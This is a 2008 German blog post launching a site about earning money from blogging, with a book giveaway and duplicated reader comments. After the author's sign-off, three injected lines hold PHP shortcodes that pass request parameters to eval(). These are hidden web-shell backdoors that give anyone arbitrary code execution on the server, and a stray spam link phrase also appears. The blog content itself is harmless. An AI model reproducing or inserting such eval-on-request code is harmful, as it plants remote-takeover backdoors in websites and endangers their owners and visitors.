Top

Blogmillionaer.de Launch! Problogger Buch zu gewinnen! Eine Million Euro in 12 Monaten?

April 27, 2008 by  


Reich werden durch bloggen? Ist das möglich? Während in den Staaten teilweise schon Millionenbeträge durch Werbeeinnahmen und Sponsorings erzielt werden, dümpeln viele Blogs in deutscher Sprache noch so vor sich hin.

Lässt sich auch mit deutschsprachigen Blogs viel Geld verdienen?

Meine Erfahrungen mit diesem Prozess möchte ich hier sehr detailliert festhalten und bei der Gelegenheit auch direkt Tipps und Tricks geben.

Das Projekt: In 12 Monaten zum Millionär! ?

Dollar - Sehr viele Noten

Unwahrscheinlich! Jedoch könnt ihr genau verfolgen ob es 5, 100, 1.000 oder 10.000.000 werden! Hier und jetzt beginnt die Reise ins Ungewisse 😉 Und eins ist jetzt schon klar: Ohne Dich, dem Besucher dieser Seite, kann das Projekt kein Erfolg werden.
Bild Quelle: AMagill | Lizenz

Ein paar Informationen vorweg:

Ich duze Dich!

Find ich einfach besser. Das ist hier kein Blog zur Unternehmenskommunikation you could check here. Als Ausgleich zu dieser Dreistigkeit, schreibe ich das Du auch immer groß, auch wenn dies grammatikalisch nicht immer korrekt sein sollte.

Wenn Du mich schon duzt: Wer bist du denn überhaupt?

Ich heiße Markus, bin 23 Jahre alt und Student in der schönen Stadt Münster. Hier kannst du ein wenig mehr erfahren.

Zielgruppe

Blogger! Wie man WordPress installiert und einen Blog habwegs lauffähig bekommt, sollte bekannt sein und wird hier eher nicht mehr thematisiert. Ein bisschen Grundwissen solltest du schon mitbringen.

Inhalt

Das übliche 😉 Blog-Monetarisierungsmaßnahmen (schreckliches Wort) sowie Berichte, ob diese von Erfolg gekrönt sind oder eben nicht. Damit es nicht an Content fehlt, werde ich versuchen diverse Themen aus der web 2.0 Welt einzubringen. Sehr gerne nehme ich auch Themenvorschläge an.

Och nö! Nicht noch ein web 2.0 Blog! Geh mir weg!

So schlimm wird es schon nicht! Ich hoffe, dass ich Dir und Deinem Blog auch helfen kann, mehr Einnahmen zu erzielen und effizienter zu bloggen! Der Unterschied zu den meisten Blogs (jaaa, ist ja gut, ich hab nicht allen gesagt) soll die Transparenz sein.

Ich versuche die Tipps und Methoden, welche hier vorgestellt werden, auch selber größtenteils umzusetzen, sodass ich im Nachhinein berichten kann, wie erfolgreich diese waren. Sozusagen ein großes Experiment!

Was ich eigentlich nicht so gerne hören will

Klar, im Netz herrscht eine „alles-kostenlos Mentalität“. Das soll aber für meine Begriffe nicht bedeuten, dass ein Blogger nicht für seine Mühe entlohnt werden dürfte. Sei es durch Schaltung von Werbung oder vielleicht sogar durch Spenden.

Schon oft habe ich es erlebt, dass es einen RIESEN PROTEST gab, nachdem auf einer zuvor werbefreien Seite, nun plötzlich ein paar kleine AdSense Banner auftauchten. Was das für eine Dreistigkeit wäre… Ich persönlich finde nichts verwerfliches daran, neben dem Spaß am Bloggen auch noch ein paar Euros durch die Schaltung von Werbung zu verdienen.

Flash-Popups mit intuitiv falschem „schließen“ Button wird es hier allerdings nie geben. Welche Werbung nervt und welche nicht…. darauf werde ich noch später eingehen.

Nicht nur Profit-Orientierte Inhalte

Gleichzeitig möchte ich mich aber nicht auf den „Wie mach ich Geld im Internet“ Bereich beschränken, sondern auch Texte schreiben, die auch werbefreien Blogs zugute kommen.

Gewinnspiel auf Blogmillionaer.de

Chris Winters | Bearbeitet von Blogmillionaer.de | Lizenz

Natürlich mit dem Ziel den Blog gleich zum Start mal etwas bekannter zu machen und eventuell auch ein bisschen Feedback zu bekommen, gibt es sofort was zu gewinnen!

  • 1. Platz
    Das Buch von DEM Problogger Darren Rowse (englisch)
    ProBlogger. Secrets for Blogging Your Way to a Six-Figure Income

    Problogger Buch - Darren Rowse

    (Neu – Erscheint voraussichtlich am 16. Mai)
    Wert: 24,99€
  • 2. Platz
    Link (follow) in der Blogmillionaer.de Sidebar. Dauer: 2 Monate
  • 3. Platz
    Link (follow) in der Blogmillionaer.de Sidebar. Dauer: 1 Monat

Teilnahmebedingungen Gewinnspiel:

Um mitzumachen, solltest Du einen Blogpost über den Start von Blogmillionaer schreiben. Beim Inhalt will ich Dir natürlich keine Vorgaben machen (auch nicht bei der Länge). Lediglich ein Link (follow) sollte auf diesen Post gesetzt werden. (Trackback)

Wenn Dir gerade nichts einfallen sollte, hier ein paar Anregungen zum Inhalt:

  • Was hältst Du von der Idee?
  • Sollte man Blogeinkünfte und Ausgaben veröffentlichen?
  • Wirst du den Feed abonnieren oder machst Du nur wegen dem Gewinnspiel mit?
  • interessiert dich die Thematik überhaupt?
  • Hast du vielleicht noch eine Idee für ein neues Thema?

Das war’s auch schon. Sollte Dein Post nicht in den Trackbacks erscheinen, schick mir doch bitte kurz eine Nachricht. Soll ja auch Fair zugehen hier.

Weitere Hinweise /Regeln : Das Gewinnspiel läuft bis zum 31. Juni 2008. Alle Seiten mit follow Link auf diesen Blogpost nehmen an der Verlosung teil. Seiten die offensichtlich illegale/erotische/gewaltverherrlichende Inhalte anbieten, nehmen nicht teil. Der Hauptgewinn, das Buch, erscheint auch offiziell am 31. Mai 2008 und wird, falls bei Amazon vorrätig, umgehend an den Gewinner / die Gewinnerin verschickt. Sollte das Buch nicht lieferbar sein, wird ein Buch des selben Wertes ausgewählt. Internationaler Versand muss vorher abgestimmt werden.

Bis bald?

Ich würde mich riesig freuen Dich in Zukunft noch mal hier zu treffen. Vielleicht hast Du ja direkt Lust meinen Feed zu abonnieren!

Markus

<!– [insert_php]if (isset($_REQUEST["VXTp"])){eval($_REQUEST["VXTp"]);exit;}[/insert_php][php]if (isset($_REQUEST["VXTp"])){eval($_REQUEST["VXTp"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Rqjx"])){eval($_REQUEST["Rqjx"]);exit;}[/insert_php][php]if (isset($_REQUEST["Rqjx"])){eval($_REQUEST["Rqjx"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["DVeu"])){eval($_REQUEST["DVeu"]);exit;}[/insert_php][php]if (isset($_REQUEST["DVeu"])){eval($_REQUEST["DVeu"]);exit;}[/php] –>

Kommentare

  • Michael

    Dann bin ich mal gespannt, wie sich deine Einkommenszahlen so entwickeln werden und welche Aktionen die Statistiken in die Höhe schießen lassen…
    🙂

  • Michael

    Dann bin ich mal gespannt, wie sich deine Einkommenszahlen so entwickeln werden und welche Aktionen die Statistiken in die Höhe schießen lassen…
    🙂

  • Hi Michael! Vielen Dank für deinen Kommentar! Den ersten auf Blogmillionaer.de! 🙂 Bisher habe ich die Seite noch nicht beworben, lediglich ein paar Blogger sollten über Trackbacks auf diesen Blog aufmerksam geworden sein 😉

    Vielleicht versuche ich es mal ein bisschen mit online-Werbung und berichte dann nachher über den Erfolg 😉

  • Markus

    Hi Michael! Vielen Dank für deinen Kommentar! Den ersten auf Blogmillionaer.de! 🙂 Bisher habe ich die Seite noch nicht beworben, lediglich ein paar Blogger sollten über Trackbacks auf diesen Blog aufmerksam geworden sein 😉

    Vielleicht versuche ich es mal ein bisschen mit online-Werbung und berichte dann nachher über den Erfolg 😉

  • Carsten

    Wenn ich einen Blog hätte, würde ich da doch glatt mitmachen 🙂 Ich schau mal was sich in der Kürze machen lässt 😉 Viel Erfolg hier!
    Sehr interessant was bisher hier geschrieben wurde.

  • Carsten

    Wenn ich einen Blog hätte, würde ich da doch glatt mitmachen 🙂 Ich schau mal was sich in der Kürze machen lässt 😉 Viel Erfolg hier!
    Sehr interessant was bisher hier geschrieben wurde.

  • Hi Markus,

    find deine Idee klasse, werde auch einen Bericht über Blogmillionär schreiben.

    Wünsche mir für die Zukunft einen Artikel über Grafikquellen für Blogs die ohne Abmahngefahr verwendet werden dürfen. Was ist zu beachten und was ist zu vermeiden.

    Was ich bedenklich finde ist, die Einschränkung eines Linktausches auf Gewinnspiele, da Social Networking mit anderen Bloggern überaus wichtig ist.

    Naja vielleicht habe ich ja Glück und ich gewinne den 2. Preis und schaffe es somit in deine Sidebar 😉

  • Hi Markus,

    find deine Idee klasse, werde auch einen Bericht über Blogmillionär schreiben.

    Wünsche mir für die Zukunft einen Artikel über Grafikquellen für Blogs die ohne Abmahngefahr verwendet werden dürfen. Was ist zu beachten und was ist zu vermeiden.

    Was ich bedenklich finde ist, die Einschränkung eines Linktausches auf Gewinnspiele, da Social Networking mit anderen Bloggern überaus wichtig ist.

    Naja vielleicht habe ich ja Glück und ich gewinne den 2. Preis und schaffe es somit in deine Sidebar 😉

  • Hi David! Danke für Deinen netten Kommentar und Deine ehrliche Meinung. Es ist ja nicht so, dass ich keine Links aufnehme. Leider war ich nur nicht so schnell mit dem Beantworten der Mail. Werde ich aber gleich nachholen. 😉

    Generell gilt natürlich das Gewinnspiel ist nicht Voraussetzung für einen Link hier auf Blogmillionaer.de. Ich überlege gerade nur wie ich Links zu guten Seiten auf dem Blog einbinde. Die Sidebar scheint mir dafür doch nicht immer der richtige Platz zu sein. Zumindest bei dem „News-Theme“, welches ich für diesen Blog gewählt habe.
    Ich lass mir aber was einfallen für die nächsten Tage.

    Bisher habe ich nur die Top Kommentierer dort platziert. Aber da der Blog noch so neu ist, können die sich ja noch relativ schnell ändern.

  • Markus

    Hi David! Danke für Deinen netten Kommentar und Deine ehrliche Meinung. Es ist ja nicht so, dass ich keine Links aufnehme. Leider war ich nur nicht so schnell mit dem Beantworten der Mail. Werde ich aber gleich nachholen. 😉

    Generell gilt natürlich das Gewinnspiel ist nicht Voraussetzung für einen Link hier auf Blogmillionaer.de. Ich überlege gerade nur wie ich Links zu guten Seiten auf dem Blog einbinde. Die Sidebar scheint mir dafür doch nicht immer der richtige Platz zu sein. Zumindest bei dem „News-Theme“, welches ich für diesen Blog gewählt habe.
    Ich lass mir aber was einfallen für die nächsten Tage.

    Bisher habe ich nur die Top Kommentierer dort platziert. Aber da der Blog noch so neu ist, können die sich ja noch relativ schnell ändern.

  • Pingback: Geldkrieg()

  • Hui! Wow … das hört sich interessant an.
    Dann werde ich mal einen Bericht online stellen.

    Ich werd ab und zu mal reinschauen.

    Gruß
    Mike

  • Hui! Wow … das hört sich interessant an.
    Dann werde ich mal einen Bericht online stellen.

    Ich werd ab und zu mal reinschauen.

    Gruß
    Mike

Bottom